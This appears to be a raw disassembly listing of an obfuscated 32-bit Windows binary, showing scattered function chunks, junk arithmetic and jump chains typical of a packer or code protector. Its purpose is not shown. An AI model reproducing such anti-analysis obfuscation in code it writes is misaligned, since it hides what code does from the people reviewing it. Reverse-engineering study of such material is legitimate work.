loc_457067:				; CODE XREF: sub_44866D-784j
		jmp	sub_45A3A8
; END OF FUNCTION CHUNK	FOR sub_44866D
; ---------------------------------------------------------------------------

loc_45706C:				; CODE XREF: y2kk37jd:0044C2FAj
		sbb	eax, 0E51415B1h
		jmp	sub_457C64
; ---------------------------------------------------------------------------
		sbb	ebx, esi
		jmp	loc_44493D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_45707E:				; CODE XREF: sub_442DDC:loc_43BFC7j
		jl	loc_44AC6D

loc_457084:				; CODE XREF: sub_4553C1-1C4Ej
		jmp	loc_43C8DB
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------

loc_457089:				; CODE XREF: y2kk37jd:00448BC1j
		jmp	loc_4431F9
; ---------------------------------------------------------------------------
		js	loc_457A9E
		shl	edx, 1Dh
		xchg	eax, ebp
		jmp	loc_44AC68

; =============== S U B	R O U T	I N E =======================================



sub_45709E	proc near		; CODE XREF: sub_45866A:loc_45422Dp
					; y2kk37jd:00454596j

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044B52C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044C11D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D682 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452651 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F80 SIZE 00000020 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_4415B8
		mov	eax, 6E103E68h
		push	ebx
		push	0E2C2383Eh
		jmp	loc_452651
sub_45709E	endp


; =============== S U B	R O U T	I N E =======================================



sub_4570BB	proc near		; DATA XREF: sub_43FBB9+Ao

; FUNCTION CHUNK AT 004419BC SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		jmp	loc_4419BC
sub_4570BB	endp

; ---------------------------------------------------------------------------
		push	9DF419A8h
		pop	eax
		sub	eax, 2A7C4157h
		or	eax, 421C71h
		sub	eax, 5E66FE0Dh
		jmp	loc_43DD70
; ---------------------------------------------------------------------------

loc_4570E0:				; CODE XREF: y2kk37jd:0044C862j
		jbe	loc_448F01
		adc	edi, 46C794F6h
; START	OF FUNCTION CHUNK FOR sub_45141B

loc_4570EC:				; CODE XREF: sub_45141B+10j
		and	edx, 0D7F97798h
		xor	edx, 1B5CB999h
		jmp	loc_45259A
; END OF FUNCTION CHUNK	FOR sub_45141B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_4570FD:				; CODE XREF: sub_453867-3FD6j
		jnz	loc_447C4F
		jmp	loc_44F377
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_457108:				; CODE XREF: y2kk37jd:004584BBj
		xor	eax, 61536A91h
		add	ebp, 49F464FEh
		jmp	loc_444928
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6A5

loc_457119:				; CODE XREF: sub_44D6A5+BF11j
		shl	edx, 18h
		and	ebp, 9CDB79E4h

loc_457122:				; CODE XREF: sub_44D6A5:loc_4417C3j
		call	sub_45405E
		push	0DE4DDF3Bh
		pop	edx
		or	edx, 0A7EC7510h
		cmp	edx, 7D47E06Bh
		jmp	loc_44C03D
; END OF FUNCTION CHUNK	FOR sub_44D6A5
; ---------------------------------------------------------------------------
		cmp	edi, 9724F3BFh
		jmp	loc_456FBA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_457149:				; CODE XREF: sub_44C4BC+32B7j
		not	ebx
		jmp	loc_44E25F
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_457150:				; CODE XREF: sub_4408B9:loc_445826j
		push	esi
		push	0AAD8F7B7h
		pop	esi
		and	esi, ds:4000EBh
		add	esi, 26C2A5BBh
		xor	eax, esi
		push	offset sub_4529D8
		jmp	sub_454BF6
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------

loc_45716F:				; CODE XREF: y2kk37jd:00449E4Cj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_457170:				; CODE XREF: sub_45136B:loc_45BD69j
		jnz	loc_458FFA
		jmp	loc_43B29B
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------

loc_45717B:				; CODE XREF: y2kk37jd:0044B4C7j
		and	edx, 263613BEh
		sub	edx, 372C6FFAh
		add	edx, 116141DFh
		call	sub_44E35F
; START	OF FUNCTION CHUNK FOR sub_445557

loc_457192:				; CODE XREF: sub_445557+Cj
		jmp	loc_4588FB
; END OF FUNCTION CHUNK	FOR sub_445557
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDF2

loc_457197:				; CODE XREF: sub_43FDF2+Fj
		jmp	sub_453BA8
; END OF FUNCTION CHUNK	FOR sub_43FDF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CE38

loc_45719C:				; CODE XREF: sub_43CE38+Aj
		jmp	nullsub_509
; END OF FUNCTION CHUNK	FOR sub_43CE38
; ---------------------------------------------------------------------------

loc_4571A1:				; CODE XREF: y2kk37jd:00447022j
		jle	loc_44E643

; =============== S U B	R O U T	I N E =======================================



sub_4571A7	proc near		; CODE XREF: sub_43C851+B2E3p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F9AD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00440DF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B61 SIZE 00000005 BYTES

		xchg	eax, [esp-4+arg_0]
		pop	eax
		mov	[ebx], eax
		xchg	edx, [esp+0]

loc_4571B0:				; CODE XREF: y2kk37jd:loc_451543j
		mov	ebx, edx
		jmp	loc_455B61
sub_4571A7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_4571B7:				; CODE XREF: sub_456809-B9CCj
		cmp	edi, ebx
		jmp	loc_43C0FD
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------

loc_4571BE:				; CODE XREF: y2kk37jd:loc_440611j
		call	sub_4526B7
		retn
; ---------------------------------------------------------------------------

loc_4571C4:				; CODE XREF: y2kk37jd:0045BF7Aj
		jmp	loc_458BA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4571C9:				; CODE XREF: sub_445226+11795j
		push	ecx
		push	0F079E60Fh
		jmp	loc_44D66C
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_4571D4:				; CODE XREF: y2kk37jd:0044DCF4j
		rol	eax, 0Fh
		call	sub_44D01D
; START	OF FUNCTION CHUNK FOR sub_454539

loc_4571DC:				; CODE XREF: sub_454539-DD7Aj
					; y2kk37jd:0044838Cj
		xor	eax, 0B01AF831h
		call	sub_440337
		push	offset loc_43DCCD
		jmp	loc_441533
; END OF FUNCTION CHUNK	FOR sub_454539

; =============== S U B	R O U T	I N E =======================================



sub_4571F1	proc near		; CODE XREF: sub_43B163:loc_43EF3Dp
					; y2kk37jd:0044013Ej

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		add	ebx, 0DB5134Fh
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_4591D7
sub_4571F1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_457203:				; CODE XREF: sub_43C7B9+1908Ej
		jle	loc_457422
		and	eax, edx

loc_45720B:				; CODE XREF: sub_43C7B9:loc_45BFAAj
		call	sub_446183
		push	0FC7F8356h
		pop	edx
		jmp	loc_44DD3B
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------

loc_45721B:				; CODE XREF: y2kk37jd:loc_453162j
		jge	loc_458A94
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_457221:				; CODE XREF: y2kk37jd:loc_44EE8Aj
					; sub_43F911+152FDj
		jmp	loc_43B290
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
		sbb	edx, ecx
		jno	loc_45B5C4
		jmp	loc_458A91
; ---------------------------------------------------------------------------

loc_457233:				; CODE XREF: y2kk37jd:00446EF0j
		and	ecx, 69396EC9h

; =============== S U B	R O U T	I N E =======================================



sub_457239	proc near		; CODE XREF: sub_43F8B8-3C73p

; FUNCTION CHUNK AT 0043F43C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00444AD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F9A1 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	ecx, 3D73CB28h
		add	ecx, ebp
		add	ecx, 73291769h
		jmp	loc_44F9A1
sub_457239	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_457250:				; CODE XREF: y2kk37jd:0043D4B9j
		mov	eax, 6A74FD15h
		push	ebx
		push	offset sub_44CCE7
		jmp	locret_44D747
; ---------------------------------------------------------------------------

loc_457260:				; CODE XREF: y2kk37jd:loc_453DC4j
		mov	eax, [esp]
		push	edx
		call	sub_441718
		push	0EE561CEEh

loc_45726E:				; CODE XREF: y2kk37jd:loc_43D62Ej
		pop	eax
		jmp	loc_456C84
; ---------------------------------------------------------------------------

loc_457274:				; CODE XREF: y2kk37jd:loc_44A89Dj
		jl	loc_441E44
		pop	ebp
; START	OF FUNCTION CHUNK FOR sub_445EF2

loc_45727B:				; CODE XREF: sub_445EF2-6910j
		and	esi, 8A3DD051h
		add	esi, 8018E694h
		xchg	esi, [esp+4+var_4]
		jmp	sub_43C326
; END OF FUNCTION CHUNK	FOR sub_445EF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E25A

loc_45728F:				; CODE XREF: sub_43E25A+C8A6j
		rol	eax, 0Eh
		call	sub_4459BC
; END OF FUNCTION CHUNK	FOR sub_43E25A
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_457297:				; CODE XREF: sub_43ED19+14j
		jmp	loc_43FE9B
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45104A

loc_45729C:				; CODE XREF: sub_45104A+15j
		add	edx, 0F26B0988h
		mov	edx, [edx]
		popf
		add	edx, [ebp-4]
		add	eax, edx
		mov	eax, [eax]
		push	esi
		push	51276C0Ah
; END OF FUNCTION CHUNK	FOR sub_45104A
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_4572B2:				; CODE XREF: sub_44B03F:loc_445B62j
		jmp	loc_43E22F
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4572B7:				; CODE XREF: sub_45B7AA-10F7Cj
		or	edx, 0D9C3F00Eh
		add	edx, 0ADCC0928h
		cmp	edx, 0FA266B83h
		jmp	loc_449C35
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447659

loc_4572CE:				; CODE XREF: sub_447659:loc_4451EDj
		add	eax, ebp
		call	sub_450B30

locret_4572D5:				; CODE XREF: sub_4532F4:loc_456C51j
		retn
; END OF FUNCTION CHUNK	FOR sub_447659
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_4572D6:				; CODE XREF: sub_44CDD5+B26Aj
		jmp	loc_448033
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_4572DB:				; CODE XREF: sub_454D0F+1E1Dj
		jmp	loc_446F8A
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451788

loc_4572E0:				; CODE XREF: sub_451788+Ej
		jmp	sub_442F42
; END OF FUNCTION CHUNK	FOR sub_451788

; =============== S U B	R O U T	I N E =======================================



sub_4572E5	proc near		; CODE XREF: y2kk37jd:00442805j
					; y2kk37jd:00458226p
		xchg	edx, [esp+0]
		pop	edx
		add	eax, edx
sub_4572E5	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_453867

loc_4572EB:				; CODE XREF: sub_453867:loc_43EA75j
		pop	edx
		mov	eax, [eax]
		push	ebp
		jmp	loc_454A88
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_4572F4:				; CODE XREF: y2kk37jd:0045A722j
		sbb	edi, ebx
; START	OF FUNCTION CHUNK FOR sub_452C88

loc_4572F6:				; CODE XREF: sub_452C88:loc_45A70Aj
		rol	edi, 5
		xor	edi, 14BFFA4Dh
		sub	eax, edi
		xchg	ebp, [esp+0]
		mov	edi, ebp
		pop	ebp
		mov	edx, [esp-8+arg_4]
		jmp	loc_44AC31
; END OF FUNCTION CHUNK	FOR sub_452C88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_45730F:				; CODE XREF: sub_45B7AA-14345j
		jnz	loc_44A686
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; START	OF FUNCTION CHUNK FOR sub_45B60B

loc_457315:				; CODE XREF: sub_45B60B-A0CDj
		jmp	sub_459800
; END OF FUNCTION CHUNK	FOR sub_45B60B
; ---------------------------------------------------------------------------
		test	edi, edx
		jmp	loc_43F240
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BE8

loc_457321:				; CODE XREF: sub_445BE8+9j
		pop	eax
		xor	eax, 4ECE5700h
		sub	eax, 3512A7Ah
		or	eax, 5EE5D652h
		jmp	loc_43C5E5
; END OF FUNCTION CHUNK	FOR sub_445BE8
; ---------------------------------------------------------------------------
		push	0DC95D534h
		pop	edx
		rol	edx, 0Fh
		or	edx, 6A45D82Eh
		call	sub_457410
; START	OF FUNCTION CHUNK FOR sub_448700

loc_45734D:				; CODE XREF: sub_448700+9001j
		jmp	loc_45939D
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_457352:				; CODE XREF: sub_4429DD+15j
		jmp	loc_45BE3C
; END OF FUNCTION CHUNK	FOR sub_4429DD

; =============== S U B	R O U T	I N E =======================================



sub_457357	proc near		; DATA XREF: sub_43C18D:loc_44FAD1o
		xchg	edi, [esp+0]
		jmp	loc_452C83
sub_457357	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442829

loc_45735F:				; CODE XREF: sub_442829+BA1Ej
					; sub_442829:loc_451D19j
		mov	eax, 1D403CB1h
		call	sub_44113A
		add	eax, 8C1E4E83h
		rol	eax, 16h

loc_457372:				; CODE XREF: sub_442829:loc_440620j
		sub	eax, 4AE95ED0h
		rol	eax, 15h
		jmp	loc_445369
; END OF FUNCTION CHUNK	FOR sub_442829
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F5C5

loc_457380:				; CODE XREF: sub_43F5C5:loc_44DA55j
		xchg	ecx, [esp+0]
		jmp	loc_45AF06
; END OF FUNCTION CHUNK	FOR sub_43F5C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_457388:				; CODE XREF: sub_449E69-6027j
		and	eax, 91AFF68h
		jns	loc_45194B

loc_457394:				; CODE XREF: sub_44F957+8j
		jmp	loc_43C445
; END OF FUNCTION CHUNK	FOR sub_449E69
; ---------------------------------------------------------------------------
		cmp	ecx, 24F96ECCh
		jmp	loc_4533C9
; ---------------------------------------------------------------------------

loc_4573A4:				; DATA XREF: sub_4487FD:loc_459017o
		call	sub_4581BB
		call	sub_43BA66
		or	eax, eax
		jnz	loc_43CDA1
		jmp	loc_44143A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460D0

loc_4573BB:				; CODE XREF: sub_4460D0+892Aj
		push	eax
		push	eax
		call	sub_44853F
		mov	esi, ebp
		sub	esi, 17744CC2h
		jmp	sub_450CFC
; END OF FUNCTION CHUNK	FOR sub_4460D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D627

loc_4573CF:				; CODE XREF: sub_44D627-71C3j
					; sub_44D627:loc_44BAEDj
		call	sub_45913D
		push	esi
		mov	esi, ecx
		push	offset sub_44B0A6
		jmp	loc_455B24
; END OF FUNCTION CHUNK	FOR sub_44D627

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4573E1	proc near		; CODE XREF: sub_448700+1995j
		retn
sub_4573E1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DC38

loc_4573E2:				; CODE XREF: sub_44DC38:loc_457909j
		pop	ecx
		xchg	edx, [esp+0]
		mov	ebx, edx
		pop	edx
		pop	edx
		jmp	loc_4435D5
; END OF FUNCTION CHUNK	FOR sub_44DC38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4573EF:				; CODE XREF: sub_445226:loc_445542j
		add	edx, 0F6EF4B95h
		xchg	edx, [esp+0]
		pushf
		push	0D1445EEh
		pop	eax
		sub	eax, 57AD2102h
		add	eax, 5D29C9A7h
		jmp	loc_444C1B
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_457410	proc near		; CODE XREF: y2kk37jd:00457348p
					; y2kk37jd:0045AC31j
		xchg	edi, [esp+0]
		pop	edi
		xor	edx, 34B30BEEh
		push	eax
		pushf
		push	483A8A3Dh
		pop	eax
sub_457410	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_457422:				; CODE XREF: sub_43C7B9:loc_457203j
		or	eax, 0BAB68425h
		jmp	loc_4524EC
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------

loc_45742D:				; CODE XREF: y2kk37jd:00445F00j
		and	edx, edi

; =============== S U B	R O U T	I N E =======================================



sub_45742F	proc near		; CODE XREF: sub_446183:loc_453C20p

; FUNCTION CHUNK AT 0044D748 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004539FE SIZE 00000012 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ebx
		mov	ebx, ebp
		xchg	ebx, [esp+0]
		mov	ebp, esp
		add	esp, 0FFFFFFECh

loc_45743E:				; CODE XREF: sub_43EF4F:loc_452A54j
		jmp	loc_4539FE
sub_45742F	endp

; ---------------------------------------------------------------------------

loc_457443:				; CODE XREF: y2kk37jd:loc_45B403j
		push	0D46D7A14h
		pop	ecx
		xor	ecx, 0BAED9F91h
		sub	ecx, 2F84F812h
		add	ecx, 0C1492945h
		mov	ecx, [ecx]
		movzx	edx, byte ptr [ecx+edx]
		jmp	loc_445D99
; ---------------------------------------------------------------------------

loc_457466:				; CODE XREF: y2kk37jd:0044AE95j
		mov	eax, [edi]

; =============== S U B	R O U T	I N E =======================================



sub_457468	proc near		; CODE XREF: y2kk37jd:0043EDD3p

; FUNCTION CHUNK AT 00444839 SIZE 0000000F BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edi, 9CCA21A1h
		mov	[edi], eax
		jmp	loc_444839
sub_457468	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_457479:				; CODE XREF: sub_445226+A7EBj
					; y2kk37jd:004519F6j
		add	ecx, ebx
		jbe	loc_450EE4
		pushf
		ror	eax, 6

loc_457485:				; CODE XREF: sub_448306+96DDj
		xor	edx, 0BA1A8A1Fh
		jmp	loc_45B1F3
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_457490:				; CODE XREF: sub_446861:loc_458766j
		call	sub_441856
		cmp	eax, [ebp-8]
		jnz	loc_45819F
		mov	eax, [ebp-14h]
		mov	eax, [eax+24h]
		jmp	loc_44E140
; END OF FUNCTION CHUNK	FOR sub_446861
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_4574A9:				; CODE XREF: sub_451E9F:loc_43C66Aj
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_451E9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444A65

loc_4574AD:				; CODE XREF: sub_444A65+7180j
		jmp	loc_44F685
; END OF FUNCTION CHUNK	FOR sub_444A65
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_4574B2:				; CODE XREF: sub_4507BF:loc_444DDAj
		jmp	sub_44461D
; END OF FUNCTION CHUNK	FOR sub_4507BF

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4574B7	proc near		; CODE XREF: sub_451E9F:loc_43EF6Ep
					; sub_451E9F-6429p

; FUNCTION CHUNK AT 0045271D SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_45271D
sub_4574B7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4537BC

loc_4574BF:				; CODE XREF: sub_4537BC+Aj
		pop	ebx
		add	ebx, 0C4460AD9h
		and	ebx, 0BE264104h
		xor	ebx, 0BD4C9A28h
		add	ebx, 4CF59A80h
		xchg	ebx, [esp+0]
		jmp	sub_454D0F
; END OF FUNCTION CHUNK	FOR sub_4537BC
; ---------------------------------------------------------------------------
		xor	eax, 43256C73h
		push	edx
		mov	edx, ecx
		xchg	edx, [esp]
		jmp	loc_4468DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44201B

loc_4574F1:				; CODE XREF: sub_44201B:loc_45B4EFj
		sub	ecx, 0CFE73B90h
		or	ecx, 7C3E36Ch
		test	ecx, 2000000h
		jmp	loc_440C32
; END OF FUNCTION CHUNK	FOR sub_44201B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444A2B

loc_457508:				; CODE XREF: sub_444A2B:loc_44F7C7j
					; sub_454D0F:loc_45BFC5j
		call	sub_4526B7
		retn
; END OF FUNCTION CHUNK	FOR sub_444A2B
; ---------------------------------------------------------------------------
		dw 7158h
dword_457510	dd 0FCD256Eh		; DATA XREF: sub_43B427+15FDCw
					; sub_457FDC:loc_4552CBr
; ---------------------------------------------------------------------------
		call	nullsub_492
		jmp	ds:dword_41E0EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_45751F:				; CODE XREF: sub_43BF31+17CDCj
		jmp	loc_4588C4
; END OF FUNCTION CHUNK	FOR sub_43BF31

; =============== S U B	R O U T	I N E =======================================



sub_457524	proc near		; DATA XREF: sub_449C4F:loc_43F0CFo

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B6C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D204 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E470 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043EA70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442D45 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00444300 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044862D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C398 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00450246 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004542FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004548F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457639 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045B8BF SIZE 0000000C BYTES

		cmp	dword ptr [ebp-4], 0
		jz	loc_43B9A3
		jmp	loc_43B6C3
sub_457524	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_457533	proc near		; CODE XREF: y2kk37jd:0043C240j
					; sub_446120-700Bp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F625 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004406B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441153 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044905D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004493E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A928 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B135 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044BCD5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044E2DC SIZE 00000013 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	esi, [esp+0]
		mov	edx, esi
		pop	esi
		jmp	loc_44E2DC
sub_457533	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	loc_4046E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466E0

loc_457547:				; CODE XREF: sub_4466E0+1246Aj
		jmp	loc_44E926
; END OF FUNCTION CHUNK	FOR sub_4466E0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_22. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ebp, esp
		jb	loc_44A93D
		add	esp, 0FFFFFFCCh
		lea	eax, nullsub_22

loc_45755E:				; CODE XREF: y2kk37jd:00446C0Cj
		jmp	loc_44A549
; ---------------------------------------------------------------------------

loc_457563:				; CODE XREF: y2kk37jd:loc_459AF5j
		xchg	esi, [esp]
		mov	ebp, esp
		push	edx
		push	ebx
		push	edx
		jmp	loc_4531CC
; ---------------------------------------------------------------------------

loc_457570:				; CODE XREF: y2kk37jd:loc_4471FCj
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		push	ecx
		push	5B33D199h
		pop	ecx
		jmp	loc_4543EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_457582:				; CODE XREF: sub_45689F-1AF3Dj
		adc	esi, ebp
		xchg	ebx, [esi]
		jmp	loc_45C277
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_45758B:				; CODE XREF: y2kk37jd:0043CCC1j
		xor	ebx, 8EB75076h
		call	sub_43D67C
; START	OF FUNCTION CHUNK FOR sub_44289F

loc_457596:				; CODE XREF: sub_44289F:loc_44EB34j
		push	esi
		sub	esi, ecx
		jmp	loc_442387
; END OF FUNCTION CHUNK	FOR sub_44289F
; ---------------------------------------------------------------------------

loc_45759E:				; DATA XREF: sub_4438B1+7CC3o
		add	eax, edx
		pop	edx
		jmp	loc_43F516
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_4575A6:				; CODE XREF: sub_4438B1j
		mov	eax, ds:dword_442820
		or	eax, eax
		jnz	loc_43F36E
		jmp	loc_43B8E4
; END OF FUNCTION CHUNK	FOR sub_4438B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_4575B9:				; CODE XREF: sub_44001E:loc_448AE7j
		jz	loc_4401F3
		jmp	loc_44A2CA
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_4575C4:				; CODE XREF: sub_44610D:loc_456C5Bj
		adc	edi, edx
		and	esi, 7ADB4FA9h
		pushf
		jmp	loc_43E990
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_4575D2:				; CODE XREF: sub_449E69+7AF6j
		add	eax, 0C57781E7h
		push	offset loc_43E9A1
		jmp	nullsub_212
; END OF FUNCTION CHUNK	FOR sub_449E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460D0

loc_4575E2:				; CODE XREF: sub_4460D0:loc_442464j
		jz	loc_43D721
		jmp	loc_4495D4
; END OF FUNCTION CHUNK	FOR sub_4460D0
; ---------------------------------------------------------------------------

loc_4575ED:				; CODE XREF: y2kk37jd:0044C3D9j
		cmp	ebx, 0DF2FBEE7h
		jmp	loc_453963
; ---------------------------------------------------------------------------

loc_4575F8:				; CODE XREF: y2kk37jd:0043B1AEj
					; y2kk37jd:0043F306j
		xchg	esi, [esp]
		mov	ecx, esi
		pop	esi
		xchg	ebp, [esp]
		mov	ecx, ebp
		xchg	eax, [esp]
		mov	ebp, eax
		pop	eax
		jmp	loc_44D43F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_416. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_45760F:				; CODE XREF: sub_4562E5-6E2j
		jmp	loc_43E96F
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------

loc_457614:				; CODE XREF: y2kk37jd:004598AAj
		sub	ebx, 0F606096Dh

loc_45761A:				; CODE XREF: y2kk37jd:00455AD8j
		add	ebx, 0CC12B7CAh
		xchg	ebx, [esp]
		jmp	sub_442C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_457628:				; CODE XREF: sub_43B8D6+D8F7j
					; sub_43B8D6:loc_455FA0j
		mov	eax, [ebp-0Ch]
		neg	eax
		sbb	eax, eax
		neg	eax
		mov	[ebp-5], al
		jmp	loc_43B9A3
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

